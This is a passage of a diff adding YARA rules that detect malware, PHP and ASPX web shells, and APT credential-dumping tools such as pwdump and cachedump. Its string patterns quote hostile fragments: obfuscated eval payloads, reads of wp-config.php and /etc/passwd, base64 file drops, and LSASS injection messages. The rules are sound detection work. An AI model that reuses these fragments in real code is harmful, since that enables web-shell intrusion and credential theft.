+      $x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii
+      $x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii
+      $x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii
+   condition: 
+      ( filesize < 10KB and 1 of them )
+}
+
+rule Unspecified_Malware_Oct16_A_RID3134 : DEMO EXE FILE MAL T1183 {
+   meta:
+      description = "Detects an unspecififed malware - October 2016"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 13:12:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d112a7e21902287e4a37112bf17d7c73a7b206e7bc81780fd87991c1519f38c8"
+      tags = "DEMO, EXE, FILE, MAL, T1183"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%s\\system32\\%s.dll" fullword ascii
+      $x2 = "%SystemRoot%\\System32\\svch%s -k nets" fullword ascii
+      $x3 = "\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A" fullword ascii
+      $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword ascii
+      $s2 = "boottemp.exe" fullword ascii
+      $s3 = "at \\\\%s %d:%d C:\\%s.exe" fullword ascii
+      $s4 = "cryptcom.dll" fullword ascii
+      $s5 = "Wininet.dll" fullword ascii
+      $s6 = "\\\\%s\\%s\\%s.exe" fullword ascii
+      $s7 = "%s%d.exe" fullword ascii
+      $s8 = "booter.exe" fullword ascii
+      $s9 = "\\\\%s\\pipe%s" fullword ascii
+      $s10 = "C:\\DelInfo.bin" fullword ascii
+      $op0 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 } 
+      $op1 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 } 
+      $op2 = { ee 11 74 cf 73 0b 91 c4 c9 57 b2 d9 36 86 a5 b4 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $x* ) or 3 of ( $s* ) or all of ( $op* ) ) ) or ( 6 of them )
+}
+
+rule Sality_Malware_Oct16_RID2E9B : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects an unspecififed malware - October 2016"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 11:21:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8eaff5e1d4b55dd6e25f007549271da10afd1fa25064d7105de0ca2735487aad"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Hello world!" fullword wide
+      $s2 = "[LordPE]" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule Unspecified_Malware_Oct16_C_RID3136 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects an unspecififed malware - October 2016"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 13:12:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a451157f75627b2fef3d663946c94ef7dacb58f08b31d0ec4c0a542a1c4e6205"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "dUSER32.DLL" fullword wide
+      $s2 = "output.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and all of them )
+}
+
+rule Bladabindi_Malware_B64_RID2F1E : DEMO EXE FILE MAL T1132 {
+   meta:
+      description = "Detects Bladabindi Malware using Base64 encoded strings"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 11:43:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dda668b0792b7679979e61f2038cf9a8ec39415cc161be00d2c8301e7d48768d"
+      tags = "DEMO, EXE, FILE, MAL, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "XHN5c3RlbTMyXA==" fullword ascii
+      $s2 = "RXhlY3V0ZSBFUlJPUg==" fullword ascii
+      $s3 = "dHJvamFuLmV4ZQ==" fullword ascii
+      $s4 = "VXBkYXRlIEVSUk9S" fullword ascii
+      $s5 = "RG93bmxvYWQgRVJST1I=" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+}
+
+rule Dorkbot_Injector_Malware_RID30AB : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Darkbot Injector"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 12:49:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bc3c5ac7180c8ac21d6908d747aa6122154d2bb51bb99ff0e0b1c65088d275dc"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Enter an integer, a real number, a character and a string : " fullword ascii
+      $s2 = "ready to finish" fullword ascii
+      $s3 = "EYEnpw" fullword ascii
+      $s4 = "somewhere i belong" fullword ascii
+      $s5 = "Not all fields were assigned" fullword ascii
+      $s6 = "take down" fullword ascii
+      $s7 = "real number = %f" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 6 of them )
+}
+
+rule Unspecified_Malware_Oct16_D_RID3137 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects unspecified malware - October 2016"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 13:13:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cd5f3bc0176a6803093ffdea6a7442c416e0d2945b6903063d17f5bb8d17519d"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\file.exe" fullword wide
+      $s2 = "new.exe" fullword wide
+      $s3 = "passwordIterations" fullword ascii
+      $op0 = { 10 00 12 00 1a 00 05 00 01 00 01 00 01 00 10 00 } 
+      $op1 = { 41 32 00 36 00 62 00 34 00 32 00 65 00 37 00 62 } 
+      $op2 = { 3c 4d 6f 64 75 6c 65 3e 00 6e 65 77 2e 65 78 65 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) or all of ( $op* ) )
+}
+
+rule Unspecified_Malware_Oct16_E_RID3138 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects unspecified Malware - October 2016"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-10-08 13:13:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "28093385130b61f22920c0ce6e56de1f2cd8eef589bebe2af31f36f51f2b4d01"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "P3pORt" fullword ascii
+      $s2 = "msdownld.tmp" fullword ascii
+      $s3 = "TMP4351$.TMP" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule MSBuild_Mimikatz_Execution_via_XML_RID3448 : DEMO S0002 SUSP T1003 T1075 T1097 T1127 T1178 {
+   meta:
+      description = "Detects an XML that executes Mimikatz on an endpoint via MSBuild"
+      author = "Florian Roth"
+      reference = "https://gist.github.com/subTee/c98f7d005683e616560bda3286b6a0d8#file-katz-xml"
+      date = "2016-10-07 15:23:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, S0002, SUSP, T1003, T1075, T1097, T1127, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "<Project ToolsVersion=" ascii
+      $x2 = "</SharpLauncher>" fullword ascii
+      $s1 = "\"TVqQAAMAAAA" ascii
+      $s2 = "System.Convert.FromBase64String(" ascii
+      $s3 = ".Invoke(" ascii
+      $s4 = "Assembly.Load(" ascii
+      $s5 = ".CreateInstance(" ascii
+   condition: 
+      all of them
+}
+
+rule Nishang_Webshell_RID2D6E : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a ASPX web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/samratashok/nishang"
+      date = "2016-09-11 10:31:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii
+      $s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii
+      $s3 = "<title>Antak Webshell</title>" fullword ascii
+      $s4 = "<asp:Button ID=\"executesql\" runat=\"server\" Text=\"Execute SQL Query\"" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x253C and filesize < 100KB and 1 of ( $s* ) )
+}
+
+rule UploadShell_98038f1efa4203432349badabad76d44337319a6_RID3657 : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 16:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "506a6ab6c49e904b4adc1f969c91e4f1a7dde164be549c6440e766de36c93215"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii
+      $s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii
+      $s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3f3c and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
+}
+
+rule DKShell_f0772be3c95802a2d1e7a4a3f5a45dcdef6997f3_RID3552 : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 16:08:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ea49d5c29f1242f81f2393b514798ff7caccb50d46c60bdfcf61db00043473b"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii
+      $s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3c0a and filesize < 300KB and all of them )
+}
+
+rule Unknown_8af033424f9590a15472a23cc3236e68070b952e_RID345B : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 15:27:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3382b5eaaa9ad651ab4793e807032650667f9d64356676a16ae3e9b02740ccf3"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii
+      $s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
+      $s3 = "fwrite($fp,base64_decode('" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6324 and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
+}
+
+rule DkShell_4000bd83451f0d8501a9dfad60dce39e55ae167d_RID352C : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 16:01:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "51a16b09520a3e063adf10ff5192015729a5de1add8341a43da5326e626315bd"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "DK Shell - Took the Best made it Better..!!" fullword ascii
+      $x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii
+      $x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii
+      $s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
+      $s9 = "$x = $_GET[\"x\"];" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3f3c and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule WebShell_5786d7d9f4b0df731d79ed927fb5a124195fc901_RID355F : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 16:10:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b1733cbb0eb3d440c4174cc67ca693ba92308ded5fc1069ed650c3c78b1da4bc"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii
+      $s2 = "input[type=text], input[type=password]{" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6c3c and filesize < 80KB and all of them )
+}
+
+rule Webshell_e8eaf8da94012e866e51547cd63bb996379690bf_RID3586 : DEMO FILE SCRIPT T1087 T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 16:16:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "027544baa10259939780e97dc908bd43f0fb940510119fc4cce0883f3dd88275"
+      tags = "DEMO, FILE, SCRIPT, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii
+      $x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii
+      $x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x213c and filesize < 100KB and 1 of ( $x* ) ) or ( 2 of them )
+}
+
+rule Unknown_0f06c5d1b32f4994c3b3abf8bb76d5468f105167_RID3522 : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 16:00:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6362372850ac7455fa9461ed0483032a1886543f213a431f81a2ac76d383b47e"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/lola.php\" ;" fullword ascii
+      $s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
+      $s3 = "fwrite($fp,base64_decode('" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6324 and filesize < 2KB and all of them )
+}
+
+rule WSOShell_0bbebaf46f87718caba581163d4beed56ddf73a7_2_RID36D5 : DEMO FILE SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects a web shell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 17:12:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d053086907aed21fbb6019bf9e644d2bae61c63563c4c3b948d755db3e78f395"
+      tags = "DEMO, FILE, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii
+      $s9 = "$mosimage_session = \"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3f3c and filesize < 300KB and all of them )
+}
+
+rule WebShell_Generic_1609_A_RID2F12 : DEMO FILE GEN T1100 WEBSHELL {
+   meta:
+      description = "Detects a PHP webshell"
+      author = "Florian Roth"
+      reference = "https://github.com/bartblaze/PHP-backdoors"
+      date = "2016-09-10 11:41:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c817a490cfd4d6377c15c9ac9bcfa136f4a45ff5b40c74f15216c030f657d035"
+      hash3 = "69b9d55ea2eb4a0d9cfe3b21b0c112c31ea197d1cb00493d1dddc78b90c5745e"
+      tags = "DEMO, FILE, GEN, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "return $qwery45234dws($b);" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3f3c and 1 of them )
+}
+
+rule Pirpi_1609_A_RID2AE4 : DEMO EXE FILE G0022 GEN MAL {
+   meta:
+      description = "Detects Pirpi Backdoor - and other malware (generic rule)"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 09:11:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2a5a0bc350e774bd784fc25090518626b65a3ce10c7401f44a1616ea2ae32f4c"
+      hash2 = "8caa179ec20b6e3938d17132980e0b9fe8ef753a70052f7e857b339427eb0f78"
+      tags = "DEMO, EXE, FILE, G0022, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "expand.exe1.gif" fullword ascii
+      $c1 = "expand.exe" fullword ascii
+      $c2 = "ctf.exe" fullword ascii
+      $s1 = "flvUpdate.exe" fullword wide
+      $s2 = "www.ThinkWorking.com" fullword wide
+      $s3 = "ctfnon.exe" fullword ascii
+      $s4 = "flv%d.exe" fullword ascii
+      $s5 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
+      $s6 = "12811[%d].gif" fullword ascii
+      $s7 = "GetApp03" fullword wide
+      $s8 = "flvUpdate" fullword wide
+      $s9 = "%d-%4.4d%d" fullword ascii
+      $s10 = "http://%s/%5.5d.html" fullword ascii
+      $s11 = "flvbho.exe" fullword wide
+      $op1 = { 74 08 c1 cb 0d 03 da 40 eb } 
+      $op2 = { 03 f5 56 8b 76 20 03 f5 33 c9 49 } 
+      $op3 = { 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or all of ( $c* ) or all of ( $op* ) ) ) or ( 8 of them )
+}
+
+rule Pirpi_1609_B_RID2AE5 : DEMO EXE FILE G0022 MAL {
+   meta:
+      description = "Detects Pirpi Backdoor"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 09:13:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "498b98c02e19f4b03dc6a3a8b6ff8761ef2c0fedda846ced4b6f1c87b52468e7"
+      tags = "DEMO, EXE, FILE, G0022, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "tconn <ip> <port> //set temp connect value, and disconnect." fullword ascii
+      $s2 = "E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d" fullword ascii
+      $s3 = "%s %s L* ListenCheckSsl fd(%d) SslV(-%d-)" fullword ascii
+      $s4 = "S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok." fullword ascii
+      $s5 = "E* ListenCheckSsl fd(%d) SslAccept Err %d" fullword ascii
+      $s6 = "%s-%s N110 Ssl Connect Ok(%s:%d)." fullword ascii
+      $s7 = "%s-%s N110 Basic Connect Ok(%s:%d)." fullword ascii
+      $s8 = "tconn <ip> <port>" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 4 of them )
+}
+
+rule pstgdump_RID2A85 : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects a tool used by APT groups - file pstgdump_RID2A85.exe"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 06:33:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "65d48a2f868ff5757c10ed796e03621961954c523c71eac1c5e044862893a106"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\pstgdump_RID2A85.pdb" ascii
+      $x2 = "Failed to dump all protected storage items - see previous messages for details" fullword ascii
+      $x3 = "ptsgdump [-h][-q][-u Username][-p Password]" fullword ascii
+      $x4 = "Attempting to impersonate domain user '%s' in domain '%s'" fullword ascii
+      $x5 = "Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d" fullword ascii
+      $x6 = "Unable to obtain handle to PStoreCreateInstance in pstorec.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule lsremora_RID2A76 : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects a tool used by APT groups"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 06:08:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5"
+      hash2 = "e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Target: Failed to load primary SAM functions." fullword ascii
+      $x2 = "lsremora_RID2A7664.dll" fullword ascii
+      $x3 = "PwDumpError:999999" fullword wide
+      $x4 = "PwDumpError" fullword wide
+      $x5 = "lsremora_RID2A76.dll" fullword ascii
+      $s1 = ":\\\\.\\pipe\\%s" fullword ascii
+      $s2 = "x%s_history_%d:%d" fullword wide
+      $s3 = "Using pipe %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule servpw_RID29B8 : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects a tool used by APT groups - file servpw_RID29B8.exe"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 00:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46"
+      hash2 = "0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Unable to open target process: %d, pid %d" fullword ascii
+      $s2 = "LSASS.EXE" fullword wide
+      $s3 = "WriteProcessMemory failed: %d" fullword ascii
+      $s4 = "lsremora64.dll" fullword ascii
+      $s5 = "CreateRemoteThread failed: %d" fullword ascii
+      $s6 = "Thread code: %d, path: %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 3 of them ) or ( all of them )
+}
+
+rule fgexec_RID2983 : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects a tool used by APT groups - file fgexec_RID2983.exe"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 23:23:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8697897bee415f213ce7bc24f22c14002d660b8aaffab807490ddbf4f3f20249"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\fgexec_RID2983.pdb" ascii
+      $x2 = "fgexec_RID2983 Remote Process Execution Tool" fullword ascii
+      $x3 = "fgexec_RID2983 CallNamedPipe failed" fullword ascii
+      $x4 = "fizzgig and the mighty foofus.net team" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule cachedump_RID2ABB : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects a tool used by APT groups - from files cachedump_RID2ABB.exe, cachedump_RID2ABB64.exe"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 08:03:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cf58ca5bf8c4f87bb67e6a4e1fb9e8bada50157dacbd08a92a4a779e40d569c4"
+      hash2 = "e38edac8c838a043d0d9d28c71a96fe8f7b7f61c5edf69f1ce0c13e141be281f"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Failed to open key SECURITY\\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? " fullword ascii
+      $s2 = "Unable to open LSASS.EXE process" fullword ascii
+      $s3 = "Service not found. Installing CacheDump Service (%s)" fullword ascii
+      $s4 = "CacheDump service successfully installed." fullword ascii
+      $s5 = "Kill CacheDump service (shouldn't be used)" fullword ascii
+      $s6 = "cacheDump [-v | -vv | -K]" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 3 of them )
+}
+
+rule PwDump_B_RID2A0F : APT DEMO EXE FILE HKTL T1003 {
+   meta:
+      description = "Detects a tool used by APT groups - file PwDump.exe"
+      author = "Florian Roth"
+      reference = "http://goo.gl/igxLyF"
+      date = "2016-09-08 03:16:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3c796092f42a948018c3954f837b4047899105845019fce75a6e82bc99317982"
+      tags = "APT, DEMO, EXE, FILE, HKTL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName" fullword ascii
+      $x2 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword ascii
+      $x3 = "where -x targets a 64-bit host" fullword ascii
+      $x4 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+      $s1 = "lsremora64.dll" fullword ascii
+      $s2 = "lsremora.dll" fullword ascii
+      $s3 = "servpw.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule ps1_toolkit_PowerUp_RID2EBB : DEMO FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file PowerUp.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 11:27:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir /text:vdir.name\" | % { " fullword ascii
+      $s2 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppools /text:name\" | % { " fullword ascii
+      $s3 = "if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {" fullword ascii
+      $s4 = "C:\\Windows\\System32\\InetSRV\\appcmd.exe list vdir /text:physicalpath | " fullword ascii
+      $s5 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe\"))" fullword ascii
+      $s6 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\InetSRV\\appcmd.exe\")) {" fullword ascii
